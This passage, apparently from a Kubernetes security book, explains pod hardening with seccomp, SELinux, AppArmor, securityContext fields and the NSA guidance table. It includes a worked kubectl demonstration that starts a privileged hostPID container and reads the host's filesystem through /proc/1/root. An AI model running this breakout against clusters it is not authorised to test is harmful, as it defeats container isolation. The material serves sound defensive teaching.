Docker’s containerd has a default seccomp profile that has prevented some zero-day attacks against the container runtime by blocking system calls in the kernel. From Kubernetes v1.22 you should enable this by default for all runtimes with the --seccomp-default kubelet flag. In some cases workloads may not run with the default profile: observability or security tools may require low-level kernel access. These workloads should have custom seccomp profiles written (rather than resorting to running them Unconfined, which allows any system call).
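Until that cluster-wide default is in place, you can request the runtime’s default profile explicitly per pod; a minimal sketch:

  securityContext:
    seccompProfile:
      type: RuntimeDefault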

Here’s an example of a fine-grained seccomp profile loaded from the host’s filesystem under /var/lib/kubelet/seccomp:

  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: profiles/fine-grained.json

seccomp is for system calls, but SELinux and AppArmor can monitor and enforce policy in userspace too, protecting files, directories, and devices.

SELinux is able to block most container breakouts with its label-based approach to filesystem and process access: it doesn’t allow containers to write anywhere but their own filesystem, or to read other containers’ directories, and it comes enabled on OpenShift and Red Hat Linuxes.

AppArmor can similarly monitor and prevent many attacks in Debian-derived Linuxes. If AppArmor is enabled, then cat /sys/module/apparmor/parameters/enabled returns Y, and it can be used in pod definitions:

annotations:
  container.apparmor.security.beta.kubernetes.io/hello: localhost/k8s-apparmor-example-deny-write

The privileged flag was described by Liz Rice as “the most dangerous flag in the history of computing,” but why are privileged containers so dangerous? Because they keep the namespaces enabled, giving the illusion of containerization, while disabling the security features that actually contain the process.

“Privileged” is a specific securityContext configuration: virtual filesystems are unmasked, LSMs are disabled, all capabilities are granted, and host devices are exposed to the container.

Running as a nonroot user without capabilities and setting allowPrivilegeEscalation to false provides robust protection against many privilege escalations:

spec:
  containers:
  - image: controlplane/hack
    securityContext:
      allowPrivilegeEscalation: false

The granularity of security contexts means each property of the configuration must be tested to ensure it is set as intended: as a defender, by configuring admission control and testing YAML; as an attacker, with a dynamic test (or amicontained) at runtime.

Tip

We explore how to detect privileges inside a container later in this chapter.

Sharing namespaces with the host also reduces the isolation of the container and opens it to greater potential risk. Any mounted filesystems effectively add to the mount namespace.

Ensure your pods’ securityContexts are correct and your systems will be safer against known attacks.

Hardened securityContext

The NSA published “Kubernetes Hardening Guidance”, which recommends a hardened set of securityContext standards. It recommends scanning for vulnerabilities and misconfigurations, least privilege, good RBAC and IAM, network firewalling and encryption, and “to periodically review all Kubernetes settings and use vulnerability scans to help ensure risks are appropriately accounted for and security patches are applied.”

Assigning least privilege to a container in a pod is the responsibility of the securityContext (see details in Table 2-2). Note that the PodSecurityPolicy resource discussed in “Runtime Policies” maps onto the config flags available in securityContext.

Table 2-2. securityContext fields
Field name(s) Usage Recommendations

privileged

Controls whether pods can run privileged containers.

Set to false.

hostPID, hostIPC

Controls whether containers can share host process namespaces.

Set to false.

hostNetwork

Controls whether containers can use the host network.

Set to false.

allowedHostPaths

Limits containers to specific paths of the host filesystem.

Use a “dummy” path name (such as /foo marked as read-only). Omitting this field results in no admission restrictions being placed on containers.

readOnlyRootFilesystem

Requires the use of a read only root filesystem.

Set to true when possible.

runAsUser, runAsGroup, supplementalGroups, fsGroup

Controls whether container applications can run with root privileges or with root group membership.

Set runAsUser to MustRunAsNonRoot.

Set runAsGroup to nonzero.

Set supplementalGroups to nonzero.

Set fsGroup to nonzero.

allowPrivilegeEscalation

Restricts escalation to root privileges.

Set to false. This measure is required to effectively enforce runAsUser: MustRunAsNonRoot settings.

SELinux

Sets the SELinux context of the container.

If the environment supports SELinux, consider adding SELinux labeling to further harden the container.

AppArmor annotations

Sets the AppArmor profile used by containers.

Where possible, harden containerized applications by employing AppArmor to constrain exploitation.

seccomp annotations

Sets the seccomp profile used to sandbox containers.

Where possible, use a seccomp auditing profile to identify required syscalls for running applications; then enable a seccomp profile to block all other syscalls.
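Pulling these recommendations together, a hardened pod might carry a securityContext like the following sketch (the user and group IDs are illustrative; adjust to your workload):

spec:
  securityContext:                  # pod-level settings
    runAsNonRoot: true
    runAsUser: 10001
    runAsGroup: 10001
    fsGroup: 10001
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: app
    image: controlplane/hack        # image reused from earlier examples
    securityContext:                # container-level settings
      privileged: false
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop: ["ALL"]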

Let’s explore these in more detail using the kubesec static analysis tool, and the selectors it uses to interrogate your Kubernetes resources.

.spec .hostPID

hostPID allows traversal from the container to the host through the /proc filesystem, which symlinks other processes’ root filesystems. To read from the host’s process namespace, privileged is needed as well:

user@host $ OVERRIDES='{"spec":{"hostPID": true,''"containers":[{"name":"1",'
user@host $ OVERRIDES+='"image":"alpine","command":["/bin/ash"],''"stdin": true,'
user@host $ OVERRIDES+='"tty":true,"imagePullPolicy":"IfNotPresent",'
user@host $ OVERRIDES+='"securityContext":{"privileged":true}}]}}'

user@host $ kubectl run privileged-and-hostpid --restart=Never -it --rm \
  --image noop --overrides "${OVERRIDES}" 1

/ # grep PRETTY_NAME /etc/*release* 2
PRETTY_NAME="Alpine Linux v3.14"

/ # ps faux | head 3
PID   USER     TIME  COMMAND
    1 root      0:07 /usr/lib/systemd/systemd noresume noswap cros_efi
    2 root      0:00 [kthreadd]
    3 root      0:00 [rcu_gp]
    4 root      0:00 [rcu_par_gp]
    6 root      0:00 [kworker/0:0H-kb]
    9 root      0:00 [mm_percpu_wq]
   10 root      0:00 [ksoftirqd/0]
   11 root      1:33 [rcu_sched]
   12 root      0:00 [migration/0]

/ # grep PRETTY_NAME /proc/1/root/etc/*release 4
/proc/1/root/etc/os-release:PRETTY_NAME="Container-Optimized OS from Google"
1

Start a privileged container and share the host process namespace.

2

As the root user in the container, check the container’s operating system version.

3

Verify we’re in the host’s process namespace (we can see PID 1, and kernel helper processes).

4

Check the distribution version of the host via the /proc filesystem inside the container. This is possible because the PID namespace is shared with the host.

Note

Without privileged, the host process namespace is inaccessible to root in the container:

/ $ grep PRETTY_NAME /proc/1/root/etc/*release*
grep: /proc/1/root/etc/*release*: Permission denied

In this case the attacker is limited to searching the filesystem or memory as their UID allows, hunting for key material or sensitive data.

containers[] .securityContext .capabilities .drop | index("ALL")

You should always drop all capabilities and only re-add those that your application needs to operate.
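A sketch of dropping everything and re-adding only the single capability a web server might need to bind a privileged port:

  securityContext:
    capabilities:
      drop: ["ALL"]
      add: ["NET_BIND_SERVICE"]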

Into the Eye of the Storm

The Captain and crew have had a fruitless raid, but this is not the last we will hear of their escapades.

As we progress through this book, we will see how Kubernetes pod components interact with the wider system, and we will witness Captain Hashjack’s efforts to exploit them.

Conclusion

There are multiple layers of configuration to secure for a pod to be used safely, and the workloads you run are the soft underbelly of Kubernetes security.

The pod is the first line of defense and the most important part of a cluster to protect. Application code changes frequently and is likely to be a source of potentially exploitable bugs.

To extend the anchor and chain metaphor, a cluster is only a strong as its weakest link. In order to be provably secure, you must use robust configuration testing, preventative control and policy in the pipeline and admission control, and runtime intrusion detection—as nothing is infallible.